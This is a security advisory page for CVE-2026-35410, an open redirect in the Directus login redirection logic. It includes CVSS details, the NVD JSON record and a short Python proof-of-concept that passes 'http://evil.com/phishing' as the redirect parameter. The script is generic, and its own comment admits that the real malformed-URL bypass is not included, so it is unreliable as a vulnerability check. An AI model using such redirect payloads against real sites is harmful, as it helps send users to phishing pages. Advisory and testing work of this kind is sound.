Security Vulnerability Report
CVE-2026-35410 CVSS 6.1 MEDIUM

CVE-2026-35410

Published: 2026-04-06 22:16:22
Last Modified: 2026-04-20 16:43:56

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.16.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-35410
import requests


def check_redirect_vuln(target_host):
    """
    Checks if the target Directus instance is vulnerable to open redirect.
    Note: The specific bypass technique depends on the malformed URL pattern.
    """
    login_path = "/auth/login"

    # Example payload logic: Attacker tries to redirect to evil.com
    # The vulnerability allows bypassing the isLoginRedirectAllowed check
    malicious_payload = "http://evil.com/phishing"

    # Construct the full URL
    url = f"{target_host}{login_path}"
    params = {"redirect": malicious_payload}

    try:
        response = requests.get(url, params=params, allow_redirects=False)

        # Analyze response headers or body for the redirect
        if "evil.com" in response.text or "evil.com" in response.headers.get("Location", ""):
            print(f"[+] Potential Vulnerability Detected at {target_host}")
            print(f"[+] Payload triggered: {malicious_payload}")
        else:
            print("[-] Vulnerability not detected or payload requires specific formatting.")
    except Exception as e:
        print(f"Error connecting to {target_host}: {e}")


if __name__ == "__main__":
    target = "http://localhost:8080"  # Replace with actual target
    check_redirect_vuln(target)

References

https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35410", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:22.097", "lastModified": "2026-04-20T16:43:55.553", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-184"}, {"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.16.1", "matchCriteriaId": "E86A8769-F082-4253-9D48-B6B484CA61FF"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}